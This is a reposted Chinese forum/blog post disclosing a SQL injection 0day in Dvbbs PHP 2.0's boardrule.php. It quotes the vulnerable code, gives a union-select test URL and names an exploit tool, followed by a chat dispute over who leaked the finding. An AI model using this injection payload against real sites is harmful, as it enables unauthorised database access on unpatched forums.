由Dvbbs PHP 0day引发的争论
================================================================
Dvbbs PHP 0day
影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 [url]www.0kee.com[/url]
--------------------分割JJ----------------------
相关代码:
function brule() {
global $dv,$db,$boardid,$lang,$groupboardid;
$groupboardid=$_GET['groupboardid'];
if(!empty($_GET['groupboardid'])){
$rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
}
else{
$rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
}
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试:[url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version
利用工具 dvbbs_php2.0_fucker_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
=========================================================================================
(应该是0DAY的发现者说的,还有可能是零客的老大 下称作者)题外话:这个0day作为内部信息我只在10号那天在群共享里发了。
之前sniperhg本打算在清明节时发出来,没想到今天下午无意中在鬼仔的blog里看到了这个。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版权信息去掉了之外跟我在群里发的txt几乎一个字都不带差的。居然说是拣的。
但是就这件事,我非常不爽。
是谁泄露的,我早晚会查个水落石出。
不是我不厚道,我是没想那么多就发出来了。
作者:
一定得查查谁泄露的
和鬼仔没关系
感觉自己内部群里不应该出现会泄露信息的人
我一直很相信自己人的
现在也不例外
没意见
看看蟑螂有何意见和想法
事都过去了。
但是我希望你能告诉是谁给你的。
OK的话就PM给我。不行就当我没说。
我不希望这个人是我群里的。
转载于:https://blog.51cto.com/blacksnow/65986
由Dvbbs PHP 0day引发的争论相关推荐
- “深度学习不能拿来乱用”,Nature论文引发激烈争论
地应栗 发自 凹非寺 量子位 报道 | 公众号 QbitAI "登上Nature的研究,就是重要的研究,还能有这样的缺陷?" 最近几天,哈佛一篇用深度学习预测余震位置的Natur ...
- 实名制引发全球大争论
实名制风暴正席卷全球.然而,隐私权之争.监管难题.真实身份确认等都在阻挠着实名制的真正实施. 不要再侥幸地认为,置身网络虚拟世界,你将获得完全的自由.因为,"实名制"紧箍咒正向你步 ...
- 研究员公开Razer 0day,插入鼠标即可获得Windows管理员权限
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 安全研究员jonhat 在推特上发现了一个 Razer Synapse 0day,用户仅插入 Razer 鼠标或键盘就能获得Windows 管理 ...
- 5G基站辐射致癌?一个源自19年前的某权威报告引发的谣言
编译:邢畅.曹培信 来源:大数据文摘(ID:BigDataDigest) 在这篇文章的内容正式开始之前,文摘菌先带大家看几张图. 你看这根孤独的柱子,其实它是一个通信基站: 再看这个平平无奇的路灯,它 ...
- 因员工调薪引发内部矛盾上热搜,茶颜悦色到底怎么了?
茶颜悦色又又上热搜了,这次不是新品.不是出省也不是闭店,而是因为员工薪资问题上微博热搜. 因为抱怨工资少,茶颜悦色三个最大的老板在七千多人的公司群里和员工吵起来了.老板没吵赢,最后在群里直接通知员工离 ...
- 全球15个顶级技术类博客
1) 生活骇客(Lifehacker) http://www.lifehacker.com 生活骇客(Lifehacker)的座右铭表达了它的全部理念:"不要为技术而生活,要为生活而关注技术 ...
- 我是架构师-设计模式-工厂模式-工厂方法
有款游戏叫模拟人生,我这里就例子就叫北漂人生吧. 北漂人生 规定安家模式 a.结婚 b.买房 c. 买车 d. 生娃 先看几种情况: 1. 我初来帝都,按照北漂人生规则,如果要安家,要遵守 a. 结婚 ...
- 《连线》杂志:2015年六大安全威胁预测
近日,美国<连线>杂志网络版刊文,根据最新趋势对2015年网络安全行业面临的重大安全威胁进行了预测和盘点. 以下为文章全文: 随着新年的钟声在午夜敲响,新一轮安全威胁无疑也将在2015年陆 ...
- 百年名校史上第一桩:博士论文抄袭,剥夺学位,涉事中国学者已在国内教书7年...
转载自:量子位 京都大学,是和东京大学并列的日本唯二顶尖高校,在中国留学圈子里素有"日本清北"之称. 但这所百年名校,却刚刚"破防了",做出历史上第一个撤销博士 ...
最新文章
- JAVA写的爬虫小工具
- mysql 5.6 初始化_MySQL 5.6 关于登陆的初始化设置
- 标准C程序设计七---12
- 新建VHDL的Vivado工程
- 本篇文档介绍如何手动在ECS实例上部署Java web项目
- Individual
- BigDecimal的用法
- linux 每周日执行脚本,Linux任务计划和周期性任务执行
- vue+nodejs 将canvas发布到dlna投屏服务
- 【汇编】JMP跳转指令的指令长度、直接转移与间接转移、段内跳转与段间跳转
- C++ new与delete的使用规范
- 注塑机自学习排程,遗传算法排程,注塑工单排计划,模具排单,注塑APS
- 牛牛现在有n张扑克牌-字符串
- 通向大规模医疗知识图谱:万字详解天衍实验室知识图谱对齐技术
- 有关电脑的英语单词(英汉对照)
- python正则表达式的学习
- 保研经验贴 某不知名211上岸华南理工大学
- linux搭建kubernetes集群(一主二从)
- 费马小定理+插板法 - Sum(HDU4704)
- 上拉、下拉电阻的原理和作用
热门文章
- java实验_Java实验报告(实验一)
- python decimal 转 float_python教程之二python数学运算
- python生成器函数(generator),python3学习笔记:生成器generator
- linux中tags文件能删除吗,Git 详细介绍查看、删除、重命名远程分支和tag
- 计算机一级办公软件选择题,计算机一级MSOffice习题
- java gson_Java 中 Gson的使用
- python最大约数是_python – 找到最大的公约数(赋值错误,我迫切需要你的帮助)
- 安全模式 提权_记一次渗透挖洞提权实战
- 大数据基础学习三:Ubuntu下安装VMware Tools超详细步骤及需要注意的问题(以ubuntu-18.04.3、Mware Workstation 15.1.0 Pro为例)
- 依赖配置中心实现注有@ConfigurationProperties的bean相关属性刷新